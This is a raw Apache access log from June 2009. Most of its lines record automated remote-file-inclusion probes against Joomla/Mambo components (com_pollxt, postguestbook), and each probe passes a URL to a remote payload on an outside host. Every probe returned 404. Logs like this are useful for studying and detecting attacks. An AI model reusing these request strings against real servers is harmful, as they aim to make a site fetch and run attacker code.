83.103.72.130 - - [19/Jun/2009:01:53:06 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:07 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:07 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:10 -0400] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:10 -0400] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
83.103.72.130 - - [19/Jun/2009:01:53:10 -0400] "GET /logs/access_log.Q109051700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
66.249.71.54 - - [19/Jun/2009:01:53:14 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L102919468172F6002AAF075+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
83.103.72.130 - - [19/Jun/2009:01:53:22 -0400] "GET /logs/access_log.Q109053100//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:26 -0400] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
83.98.209.71 - - [19/Jun/2009:01:53:26 -0400] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://jiao-hua.org/cache/idade1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
